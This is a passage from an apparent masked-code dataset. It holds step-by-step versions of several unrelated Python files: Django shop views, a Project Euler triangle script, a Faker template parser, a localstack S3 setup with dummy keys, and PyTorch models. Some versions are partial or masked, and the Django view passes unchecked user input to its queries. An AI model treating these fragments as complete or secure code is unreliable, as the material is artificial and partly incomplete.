"step-4": "from django.shortcuts import *\nfrom shop.models import *\nfrom django.db import transaction\nfrom django.core.exceptions import *\n\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST[\n 'computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.\n POST['graphics_card'])\n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST[\n 'minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST[\n 'maxMemory']))\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.\n POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.\n POST['maxssd']))\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.\n POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.\n POST['maxDisk']))\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': '请输入整数'})\n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST[\n 'brand'])\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n ctx['computer'] = computer\n return render(request, 'Dashio/computers.html', ctx)\n\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, pk=computer_id)\n rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=\n computer_id).count()\n rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id\n =computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id\n ).order_by('-buy_time')[:5]\n if rtx['isUser']:\n rtx['mark'] = '收藏' if mark.objects.filter(user_id__user_id=rtx[\n 'user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏'\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=\n request.POST['comment']).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id,\n user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n return HttpResponseRedirect(reverse('shop:computerDetail', args=(\n computer_id,)))\n",
"step-5": "from django.shortcuts import *\nfrom shop.models import *\nfrom django.db import transaction\nfrom django.core.exceptions import *\n\n@transaction.atomic\ndef computers(request):\n ctx = {}\n computer = Computer.objects.all()\n ctx['brand'] = Brand.objects.all()\n\n if request.method == 'POST':\n if request.POST['computer_id'] != '':\n computer = computer.filter(computer_id__icontains=request.POST['computer_id'])\n if request.POST['cpu'] != '':\n computer = computer.filter(cpu__icontains=request.POST['cpu'])\n if request.POST['graphics_card'] != '':\n computer = computer.filter(graphics_card__icontains=request.POST['graphics_card'])\n \n try:\n if request.POST['minMemory'] != '':\n computer = computer.filter(memory__gte=int(request.POST['minMemory']))\n if request.POST['maxMemory'] != '':\n computer = computer.exclude(memory__gte=int(request.POST['maxMemory']))\n\n if request.POST['minssd'] != '':\n computer = computer.filter(ssd_capacity__gte=int(request.POST['minssd']))\n if request.POST['maxssd'] != '':\n computer = computer.exclude(ssd_capacity__gte=int(request.POST['maxssd']))\n\n if request.POST['minDisk'] != '':\n computer = computer.filter(disk_capacity__gte=int(request.POST['minDisk']))\n if request.POST['maxDisk'] != '':\n computer = computer.exclude(disk_capacity__gte=int(request.POST['maxDisk']))\n\n except ValueError:\n return render(request, 'Dashio/error.html', {'error': \"请输入整数\"})\n \n if request.POST.get('brand', '') != '':\n print(request.POST['brand'])\n computer = computer.filter(brand__name__icontains=request.POST['brand'])\n\n if request.POST['sort'] != '':\n sortKey = request.POST['sortType'] + request.POST['sort']\n computer = computer.order_by(sortKey)\n\n ctx['computer'] = computer\n return render(request, \"Dashio/computers.html\", ctx)\n\n@transaction.atomic\ndef details(request, computer_id):\n rtx = {}\n rtx['isUser'] = request.session['type'] == 'user'\n rtx['computer'] = get_object_or_404(Computer, pk=computer_id)\n rtx['markAmount'] = mark.objects.filter(computer_id__computer_id=computer_id).count()\n rtx['sell'] = Sell.objects.filter(computer_id__computer_id=computer_id)\n rtx['user_id'] = request.session['id']\n rtx['sellAmount'] = Buy.objects.filter(computer_id__computer_id=computer_id).count()\n rtx['comments'] = computer_comment.objects.filter(computer_id__computer_id=computer_id).order_by('-comment_date')\n rtx['buys'] = Buy.objects.filter(computer_id__computer_id=computer_id).order_by('-buy_time')[:5]\n \n if rtx['isUser']:\n rtx['mark'] = ('收藏' if mark.objects.filter(user_id__user_id=rtx['user_id'], computer_id=rtx['computer']).count() == 0 else '取消收藏')\n\n return render(request, 'Dashio/computer_detail.html', rtx)\n\n@transaction.atomic\ndef post(request, user_id, computer_id):\n if request.method == 'POST':\n computer = Computer.objects.get(pk=computer_id)\n user = User.objects.get(pk=user_id)\n computer_comment(computer_id=computer, user_id=user, content=request.POST['comment']).save()\n \n return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))\n\ndef makeMark(request, computer_id, user_id):\n try:\n m = mark.objects.get(computer_id__computer_id=computer_id, user_id__user_id=user_id)\n m.delete()\n except ObjectDoesNotExist:\n computer = get_object_or_404(Computer, pk=computer_id)\n user = get_object_or_404(User, pk=user_id)\n mark(computer_id=computer, user_id=user).save()\n \n return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
f=open('p102_triangles.txt')
def cross(a,b,c):
t1=b[0]-a[0]
t2=b[1]-a[1]
t3=c[0]-a[0]
t4=c[1]-a[1]
return t1*t4-t2*t3
x=[0,0]
y=[0,0]
z=[0,0]
origin=(0,0)
ans=0
for i in f.xreadlines():
x[0],x[1],y[0],y[1],z[0],z[1]=map(int,i.split(','))
area1=abs(cross(x,y,z))
area2=abs(cross(x,y,origin))+abs(cross(y,z,origin))+abs(cross(z,x,origin))
if area1==area2:
ans+=1
print ans
|
normal
|
{
"blob_id": "c34ff2bbb0ba743268ace77c110ce0b283a25eba",
"index": 8637,
"step-1": "f=open('p102_triangles.txt')\n\ndef cross(a,b,c):\n t1=b[0]-a[0]\n t2=b[1]-a[1]\n t3=c[0]-a[0]\n t4=c[1]-a[1]\n return t1*t4-t2*t3\n\nx=[0,0]\ny=[0,0]\nz=[0,0]\norigin=(0,0)\nans=0\nfor i in f.xreadlines():\n x[0],x[1],y[0],y[1],z[0],z[1]=map(int,i.split(','))\n area1=abs(cross(x,y,z))\n area2=abs(cross(x,y,origin))+abs(cross(y,z,origin))+abs(cross(z,x,origin))\n if area1==area2:\n ans+=1\n\nprint ans\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TemplateParser:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
<|reserved_special_token_0|>
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TemplateParser:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TemplateParser:
"""Parser for templates, using jinja2 and Faker"""
fake = None
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from datetime import datetime
from jinja2 import Template
from faker import Faker
from faker.providers.internet import Provider as InternetProvider
from ..providers.file_data_source_provider import FileDataSourceProvider
from ..providers.numbers_provider import NumbersProvider
class TemplateParser:
"""Parser for templates, using jinja2 and Faker"""
fake = None
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = (TemplateParser.null_date_generator if
date_generator is None else date_generator)
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator, next=next, **self.providers, **
kwargs)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Template parser for Faker"""
from datetime import datetime
from jinja2 import Template
from faker import Faker
from faker.providers.internet import Provider as InternetProvider
from ..providers.file_data_source_provider import FileDataSourceProvider
from ..providers.numbers_provider import NumbersProvider
class TemplateParser:
"""Parser for templates, using jinja2 and Faker"""
fake = None
def __init__(self, template=None, providers=None, date_generator=None):
self.fake = Faker()
self.fake.add_provider(FileDataSourceProvider)
self.fake.add_provider(NumbersProvider)
# Ips networks emails etc..
self.fake.add_provider(InternetProvider)
self.template = template
self.providers = {} if providers is None else providers
self.date_generator = TemplateParser.null_date_generator \
if date_generator is None else date_generator
@staticmethod
def null_date_generator():
"""Generate now date"""
return str(datetime.now())
def process(self, date_generator=None, **kwargs):
"""Procces template, parsing it"""
template = Template(self.template)
if date_generator is None:
date_generator = self.date_generator
# Only the passed objects will be accessible from the template
# the next built-in needs to be passed for next(date_generator) to work
return template.render(fake=self.fake, datetime=datetime,
date_generator=date_generator,
next=next, **self.providers, **kwargs)
|
flexible
|
{
"blob_id": "38f9cddfde4787ead2314fc70c1f4d91a3da9687",
"index": 1307,
"step-1": "<mask token>\n\n\nclass TemplateParser:\n <mask token>\n <mask token>\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n <mask token>\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-2": "<mask token>\n\n\nclass TemplateParser:\n <mask token>\n <mask token>\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-3": "<mask token>\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-4": "<mask token>\nfrom datetime import datetime\nfrom jinja2 import Template\nfrom faker import Faker\nfrom faker.providers.internet import Provider as InternetProvider\nfrom ..providers.file_data_source_provider import FileDataSourceProvider\nfrom ..providers.numbers_provider import NumbersProvider\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = (TemplateParser.null_date_generator if \n date_generator is None else date_generator)\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n if date_generator is None:\n date_generator = self.date_generator\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator, next=next, **self.providers, **\n kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Template parser for Faker\"\"\"\nfrom datetime import datetime\nfrom jinja2 import Template\nfrom faker import Faker\nfrom faker.providers.internet import Provider as InternetProvider\nfrom ..providers.file_data_source_provider import FileDataSourceProvider\nfrom ..providers.numbers_provider import NumbersProvider\n\n\nclass TemplateParser:\n \"\"\"Parser for templates, using jinja2 and Faker\"\"\"\n fake = None\n\n def __init__(self, template=None, providers=None, date_generator=None):\n self.fake = Faker()\n self.fake.add_provider(FileDataSourceProvider)\n self.fake.add_provider(NumbersProvider)\n # Ips networks emails etc..\n self.fake.add_provider(InternetProvider)\n self.template = template\n self.providers = {} if providers is None else providers\n self.date_generator = TemplateParser.null_date_generator \\\n if date_generator is None else date_generator\n\n @staticmethod\n def null_date_generator():\n \"\"\"Generate now date\"\"\"\n return str(datetime.now())\n\n def process(self, date_generator=None, **kwargs):\n \"\"\"Procces template, parsing it\"\"\"\n template = Template(self.template)\n\n if date_generator is None:\n date_generator = self.date_generator\n\n # Only the passed objects will be accessible from the template\n # the next built-in needs to be passed for next(date_generator) to work\n return template.render(fake=self.fake, datetime=datetime,\n date_generator=date_generator,\n next=next, **self.providers, **kwargs)\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
from os import environ
from process import process
from s3Service import put_object
environ['ACCESS_KEY'] = '1234567890'
environ['SECRET_KEY'] = '1234567890'
environ['ENDPOINT_URL'] = 'http://localhost:4566'
environ['REGION'] = 'us-east-1'
environ['BUCKET_GLOBAL'] = 'fl2-statement-global'
environ['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'
environ['BUCKET_TRANSFER'] = 'fl2-statement-transfer'
environ['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'
BUCKET_GLOBAL = environ['BUCKET_GLOBAL']
# def test():
#
# file = open('EEVC.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEVC.TXT', file) # OK
#
# file = open('EEVD.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEVD.TXT', file) # OK
#
# file = open('EEFI.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EEFI.TXT', file) # OK
#
# file = open('EESA.TXT', mode='rb')
# put_object(BUCKET_GLOBAL, 'EESA.TXT', file) # OK
def execute(event, context):
print(event)
pass
# payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVC.TXT'}
# process(bucket=payload['Bucket'], key=payload['Key'])
#
# payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVD.TXT'}
# process(bucket=payload['Bucket'], key=payload['Key'])
#
# payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEFI.TXT'}
# process(bucket=payload['Bucket'], key=payload['Key'])
#
# payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EESA.TXT'}
# process(bucket=payload['Bucket'], key=payload['Key'])
# Press the green button in the gutter to run the script.
# if __name__ == '__main__':
# test()
# execute(None, None)
|
normal
|
{
"blob_id": "a4eca0f5b7d5a03ca3600554ae3fe3b94c59fc68",
"index": 8622,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-3": "<mask token>\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-4": "from os import environ\nfrom process import process\nfrom s3Service import put_object\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\ndef execute(event, context):\n print(event)\n pass\n",
"step-5": "from os import environ\nfrom process import process\nfrom s3Service import put_object\n\nenviron['ACCESS_KEY'] = '1234567890'\nenviron['SECRET_KEY'] = '1234567890'\nenviron['ENDPOINT_URL'] = 'http://localhost:4566'\nenviron['REGION'] = 'us-east-1'\nenviron['BUCKET_GLOBAL'] = 'fl2-statement-global'\nenviron['BUCKET_GLOBAL_BACKUP'] = 'fl2-statement-global-bkp'\nenviron['BUCKET_TRANSFER'] = 'fl2-statement-transfer'\nenviron['BUCKET_PENDING_PROCESS'] = 'fl2-statement-pending-process'\n\nBUCKET_GLOBAL = environ['BUCKET_GLOBAL']\n\n\n# def test():\n#\n# file = open('EEVC.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEVC.TXT', file) # OK\n#\n# file = open('EEVD.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEVD.TXT', file) # OK\n#\n# file = open('EEFI.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EEFI.TXT', file) # OK\n#\n# file = open('EESA.TXT', mode='rb')\n# put_object(BUCKET_GLOBAL, 'EESA.TXT', file) # OK\n\n\ndef execute(event, context):\n\n print(event)\n pass\n\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVC.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEVD.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EEFI.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n #\n # payload = {'Bucket': BUCKET_GLOBAL, 'Key': 'EESA.TXT'}\n # process(bucket=payload['Bucket'], key=payload['Key'])\n\n\n# Press the green button in the gutter to run the script.\n# if __name__ == '__main__':\n# test()\n# execute(None, None)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
class Encoder(nn.Module):
def __init__(self):
super(Encoder, self).__init__()
self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)
self.bn1 = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)
self.bn2 = nn.BatchNorm2d(48)
def forward(self, x):
x = torch.mean(x, 1).view(x.size()[0], 1, x.size()[2], x.size()[3])
x = F.max_pool2d(F.relu(self.bn1(self.conv1(x))), stride=2, kernel_size=2, dilation=(1, 1))
x = F.max_pool2d(F.relu(self.bn2(self.conv2(x))), stride=2, kernel_size=2, dilation=(1, 1))
#print(x.size())
x = x.view(x.size(0), 48*4*4)
return x
class Classifier(nn.Module):
def __init__(self, args, prob=0.5):
super(Classifier, self).__init__()
self.fc1 = nn.Linear(48*4*4, 100)
self.bn1_fc = nn.BatchNorm1d(100)
self.fc2 = nn.Linear(100, 100)
self.bn2_fc = nn.BatchNorm1d(100)
self.fc3 = nn.Linear(100, 10)
self.bn_fc3 = nn.BatchNorm1d(10)
self.prob = prob
self.use_drop = args.use_drop
self.use_bn = args.use_bn
self.use_gumbel = args.use_gumbel
def forward(self, x):
x = F.dropout(x, training=self.training, p=self.prob)
x = F.relu(self.bn1_fc(self.fc1(x)))
x = F.dropout(x, training=self.training, p=self.prob)
x = F.relu(self.bn2_fc(self.fc2(x)))
x = F.dropout(x, training=self.training, p=self.prob)
x = self.fc3(x)
return x
class Generator(nn.Module):
def __init__(self, nz=100):
super(Generator, self).__init__()
self.network = nn.Sequential(
# input is Z, going into a convolution
nn.ConvTranspose2d(nz, 512, 4, 1, 0, bias=False),
nn.BatchNorm2d(512),
nn.ReLU(True),
# state size. (ngf*8) x 4 x 4
nn.ConvTranspose2d(512, 256, 3, 2, 1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(True),
# state size. (ngf*2) x 8 x 8
nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(True),
# state size. (ngf) x 16 x 16
nn.ConvTranspose2d(128, 1, 4, 2, 1, bias=False),
nn.Tanh()
# state size. (nc) x 32 x 32
)
def forward(self, x):
# print(x.shape) # torch.Size([64, 100, 1, 1])
x = self.network(x)
# print(x.shape) # torch.Size([64, 1, 28, 28])
return x
|
normal
|
{
"blob_id": "9140da0b6c04f39a987a177d56321c56c01586e8",
"index": 3739,
"step-1": "<mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n <mask token>\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-2": "<mask token>\n\n\nclass Encoder(nn.Module):\n <mask token>\n <mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-3": "<mask token>\n\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n <mask token>\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = nn.BatchNorm1d(10)\n self.prob = prob\n self.use_drop = args.use_drop\n self.use_bn = args.use_bn\n self.use_gumbel = args.use_gumbel\n\n def forward(self, x):\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn1_fc(self.fc1(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = F.relu(self.bn2_fc(self.fc2(x)))\n x = F.dropout(x, training=self.training, p=self.prob)\n x = self.fc3(x)\n return x\n\n\nclass Generator(nn.Module):\n\n def __init__(self, nz=100):\n super(Generator, self).__init__()\n self.network = nn.Sequential(nn.ConvTranspose2d(nz, 512, 4, 1, 0,\n bias=False), nn.BatchNorm2d(512), nn.ReLU(True), nn.\n ConvTranspose2d(512, 256, 3, 2, 1, bias=False), nn.BatchNorm2d(\n 256), nn.ReLU(True), nn.ConvTranspose2d(256, 128, 4, 2, 1, bias\n =False), nn.BatchNorm2d(128), nn.ReLU(True), nn.ConvTranspose2d\n (128, 1, 4, 2, 1, bias=False), nn.Tanh())\n\n def forward(self, x):\n x = self.network(x)\n return x\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, kernel_size=5, stride=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 48, kernel_size=5, stride=1)\n self.bn2 = nn.BatchNorm2d(48)\n\n def forward(self, x):\n x = torch.mean(x, 1).view(x.size()[0], 1, x.size()[2], x.size()[3])\n x = F.max_pool2d(F.relu(self.bn1(self.conv1(x))), stride=2,\n kernel_size=2, dilation=(1, 1))\n x = F.max_pool2d(F.relu(self.bn2(self.conv2(x))), stride=2,\n kernel_size=2, dilation=(1, 1))\n x = x.view(x.size(0), 48 * 4 * 4)\n return x\n\n\nclass Classifier(nn.Module):\n\n def __init__(self, args, prob=0.5):\n super(Classifier, self).__init__()\n self.fc1 = nn.Linear(48 * 4 * 4, 100)\n self.bn1_fc = nn.BatchNorm1d(100)\n self.fc2 = nn.Linear(100, 100)\n self.bn2_fc = nn.BatchNorm1d(100)\n self.fc3 = nn.Linear(100, 10)\n self.bn_fc3 = 